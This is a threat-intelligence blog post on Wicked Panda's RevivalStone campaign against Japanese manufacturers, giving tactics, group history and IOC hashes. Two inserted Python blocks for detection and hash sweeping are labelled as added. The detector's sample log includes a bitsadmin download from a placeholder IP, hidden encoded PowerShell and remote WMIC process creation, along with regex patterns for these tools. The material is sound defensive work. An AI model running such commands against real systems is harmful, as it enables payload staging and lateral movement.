The PolySwarm Blog


Wicked Panda’s RevivalStone Campaign Targets Manufacturing Entities in Japan

Feb 28, 2025 1:03:00 PM / by The Hivemind

Verticals Targeted: Manufacturing

Executive Summary

A persistent and sophisticated espionage campaign by the China-linked threat actor group Wicked Panda was observed targeting Japan’s manufacturing sector. The campaign has been dubbed RevivalStone.

Key Takeaways

  • A persistent and sophisticated espionage campaign by the China-linked threat actor group Wicked Panda is targeting Japan’s manufacturing sector, with continuing activity detected in early 2025. 
  • In this campaign, dubbed RevivalStone, the threat actors used a robust arsenal of custom backdoors, including newly developed variants with polymorphic capabilities.
  • Malware payloads used in the campaign include ELF-based injectors for Linux systems, leveraging shellcode injection to evade host-based defenses, and Windows PE files with heavily obfuscated code.

The Campaign 

A persistent and sophisticated espionage campaign by the China-linked threat actor group Wicked Panda is targeting Japan’s manufacturing sector, with continuing activity detected in early 2025. Wicked Panda leverages a combination of custom malware, zero-day exploits, and stealthy operational tactics, posing a significant risk. The campaign, first identified in late 2024, has escalated in scope and sophistication, making it a top concern for cybersecurity professionals monitoring nation-state threats in the region. LAC Security reported on this activity. 

In this campaign, dubbed RevivalStone, the threat actors used a robust arsenal of custom backdoors, including newly developed variants with polymorphic capabilities. They used spearphishing campaigns with weaponized PDFs, LNK files, or malicious Office macros to achieve initial access. They also exploited zero-day vulnerabilities in operational technology (OT) systems, such as Siemens PLCs, SCADA software, and Rockwell Automation platforms, as well as IT environments running unpatched Windows and Linux distributions. 

Malware payloads used in the campaign include ELF-based injectors for Linux systems, leveraging shellcode injection to evade host-based defenses, and Windows PE files with heavily obfuscated code, incorporating anti-debugging techniques and encrypted C2 communications via HTTPS/TLS tunnels on dynamic ports (e.g., 443/TCP, 8443/TCP). The group employed living-off-the-land techniques, such as PowerShell scripts, WMI queries, and BITSAdmin for lateral movement. Recent activity indicates AI-driven polymorphic malware adapting to sandbox environments, complicating static and dynamic analysis with evasion tactics, such as time-based delays and CPU fingerprinting.
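The living-off-the-land tooling named above (PowerShell, WMI, BITSAdmin) is usually caught from process-creation telemetry rather than from file hashes. The following is an added example, not code from the PolySwarm post or from LAC Security: it runs three illustrative heuristics over constructed process-creation records. The record layout (timestamp|host|user|image|command line), the hostnames, the 203.0.113.10 address and the encoded-command token are all assumptions made for the sample; the regexes are teaching heuristics, not a vendor ruleset.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation events (hypothetical, not from the bulletin).
# Assumed record layout: timestamp|host|user|image path|command line
SAMPLE_EVENTS = """\
2025-02-10T09:12:01Z|PLANT-WS01|operator|C:\\Windows\\System32\\bitsadmin.exe|bitsadmin /transfer job1 /download /priority high http://203.0.113.10/upd.bin C:\\Users\\Public\\upd.bin
2025-02-10T09:12:05Z|PLANT-WS01|operator|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -NoP -W Hidden -EncodedCommand VwByAGkAdABlAC0ASABvcwB0AIAAaABpAA==
2025-02-10T09:12:09Z|PLANT-WS01|operator|C:\\Windows\\System32\\wbem\\WMIC.exe|wmic /node:PLANT-WS02 process call create "cmd.exe /c whoami"
2025-02-10T09:13:00Z|PLANT-WS01|operator|C:\\Windows\\System32\\notepad.exe|notepad.exe C:\\Users\\operator\\notes.txt
2025-02-10T09:14:00Z|PLANT-WS03|svc_backup|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -File C:\\Scripts\\nightly-backup.ps1
"""


@dataclass
class Finding:
    timestamp: str
    host: str
    user: str
    rule: str
    command_line: str


# Illustrative heuristics over the command line (constructed for this example):
#  - BITSAdmin fetching from a URL, a common download-and-stage pattern
#  - PowerShell launched hidden or with an encoded command
#  - WMIC creating a process on a remote node (lateral movement)
LOTL_RULES = [
    ("bitsadmin_transfer_from_url",
     re.compile(r"\bbitsadmin(?:\.exe)?\b.*?/transfer\b.*?\bhttps?://", re.I)),
    ("powershell_encoded_or_hidden",
     re.compile(r"\bpowershell(?:\.exe)?\b.*?(?:-e(?:nc(?:odedcommand)?)?\s|-w(?:indowstyle)?\s+hidden\b)", re.I)),
    ("wmic_remote_process_create",
     re.compile(r"\bwmic(?:\.exe)?\b.*?/node:\S+.*?\bprocess\s+call\s+create\b", re.I)),
]


def parse_event(line):
    """Split one record into its five fields; return None for malformed lines."""
    parts = line.rstrip("\n").split("|", 4)
    if len(parts) != 5:
        return None
    return parts


def detect_lotl(text, rules=LOTL_RULES):
    """Return one Finding per event whose command line matches a rule (first matching rule wins)."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parsed = parse_event(line)
        if parsed is None:
            continue
        timestamp, host, user, _image, cmdline = parsed
        for name, pattern in rules:
            if pattern.search(cmdline):
                findings.append(Finding(timestamp, host, user, name, cmdline))
                break
    return findings


def hosts_with_findings(findings):
    """Count findings per host, a quick way to see where triage should start."""
    counts = {}
    for f in findings:
        counts[f.host] = counts.get(f.host, 0) + 1
    return counts


if __name__ == "__main__":
    for f in detect_lotl(SAMPLE_EVENTS):
        print(f"{f.timestamp} {f.host} {f.user} [{f.rule}] {f.command_line}")
```

In the sample, the three PLANT-WS01 events fire and the two benign ones (notepad, a scripted backup) do not; in practice these heuristics need per-environment allow-listing, since administrators legitimately use all three tools.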

This campaign primarily targeted automotive and electronics manufacturing entities in Japan, focusing on critical OT assets like distributed control systems, industrial IoT devices, and SCADA networks, which are integral to smart factory operations. The threat actors exfiltrated data including proprietary CAD files, production algorithms, and trade secrets, often compressed with RAR archives and embedded with steganographic techniques in image files to mask exfiltration traffic. This espionage campaign likely aligns with China’s strategic economic espionage goals by acquiring intelligence on advanced manufacturing techniques and competitive advantages in global markets. 

Who is Wicked Panda?

Wicked Panda, also known as Axiom, Winnti, APT41, and Bronze Atlas, is a sophisticated China nexus threat actor group perpetrating activity in support of or in conjunction with the Chinese Ministry of State Security (MSS) and the People's Liberation Army (PLA). Active since at least 2009, Wicked Panda’s roots seem to have emerged in cybercrime and later evolved into the group’s current form. 

Their activity has ranged from criminal, financially motivated attacks to stealthy espionage campaigns in support of Chinese military intelligence collection requirements. Wicked Panda has been known to attack a wide range of targets including software development companies, computer hardware manufacturers, telecommunications providers, social media companies, video game companies, non-profit organizations, universities, think tanks, manufacturing entities, and foreign governments. The group has targeted a broad range of entities across the APAC, AMEA, and AMERICAS regions.

Wicked Panda is known for having skilled programmers capable of developing sophisticated tools. The group uses a variety of TTPs including but not limited to LotL (living-off-the-land) tactics, phishing, ransomware, cryptocurrency mining, supply chain attacks, China Chopper, Gh0st RAT, PlugX, HighNoon, Derusbi, BioPass RAT, RedXOR, and ShadowPad. The group is also known to steal software signing certificates to use in their campaigns.

IOCs

PolySwarm has multiple samples associated with this activity.


e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596

169d35bdb36c2bfcb3bbf64392de1b05d56553172a13cae43a43acbe2aa18587

b9d4ec771a79f53a330b29ed17f719dac81a4bfe11caf0eac0efacd19d14d090

4608a63c039975fb8f3ffd221ec6877078542def44767f50447db1d514eb0779

1e53559e6be1f941df1a1508bba5bb9763aedba23f946294ce5d92646877b40c


You can use the following CLI command to search for all xx samples in our portal:

$ polyswarm link list -t RevivalStone
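For readers who want to check their own hosts against the hashes above without the portal, here is an added example (not code from the PolySwarm post or the PolySwarm CLI). It embeds the five SHA-256 IOCs exactly as listed in the bulletin, parses an optional hash-list file in a simple one-hash-per-line format (an assumed format, not a PolySwarm export), and sweeps a directory tree comparing each file's SHA-256 against the set. The self-check builds a temporary directory with constructed benign files, so it runs offline.

```python
import hashlib
import os
import re
import tempfile
from pathlib import Path

# SHA-256 hashes exactly as listed in the bulletin's IOC section.
REVIVALSTONE_SHA256 = frozenset({
    "e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596",
    "169d35bdb36c2bfcb3bbf64392de1b05d56553172a13cae43a43acbe2aa18587",
    "b9d4ec771a79f53a330b29ed17f719dac81a4bfe11caf0eac0efacd19d14d090",
    "4608a63c039975fb8f3ffd221ec6877078542def44767f50447db1d514eb0779",
    "1e53559e6be1f941df1a1508bba5bb9763aedba23f946294ce5d92646877b40c",
})

_HEX64 = re.compile(r"^[0-9a-f]{64}$")


def parse_ioc_text(text):
    """Parse a hash list (assumed format): one SHA-256 per line, '#' comments and
    blank lines ignored, anything that is not 64 hex characters dropped."""
    iocs = set()
    for line in text.splitlines():
        value = line.split("#", 1)[0].strip().lower()
        if _HEX64.match(value):
            iocs.add(value)
    return iocs


def sha256_of_file(path, chunk_size=1 << 20):
    """Stream the file through SHA-256 so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def is_known_ioc(digest, iocs=REVIVALSTONE_SHA256):
    """Case- and whitespace-insensitive membership test, since hash lists are often pasted."""
    return digest.strip().lower() in iocs


def sweep_directory(root, iocs=REVIVALSTONE_SHA256):
    """Hash every regular file under root and return [(path, digest)] for matches.
    Symlinks are skipped (they could point outside the tree) and unreadable files are ignored."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            if path.is_symlink() or not path.is_file():
                continue
            try:
                digest = sha256_of_file(path)
            except OSError:
                continue
            if digest in iocs:
                hits.append((str(path), digest))
    return hits


def self_check():
    """Constructed end-to-end run: a temp dir holding an empty file and a benign text file."""
    with tempfile.TemporaryDirectory() as tmp:
        empty = Path(tmp) / "empty.bin"
        empty.write_bytes(b"")
        (Path(tmp) / "readme.txt").write_text("constructed benign content\n")
        return {"hits": sweep_directory(tmp), "empty_digest": sha256_of_file(empty)}


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, digest in sweep_directory(root):
        print(f"MATCH {digest}  {path}")
```

A hash match is exact-sample detection only: a recompiled or repacked variant of the same implant will not match, so this complements rather than replaces behavioural telemetry.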


Don’t have a PolySwarm account? Go here to sign up for a free Community plan or subscribe.

Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.


Topics: Threat Bulletin, Wicked Panda, Winnti, RevivalStone
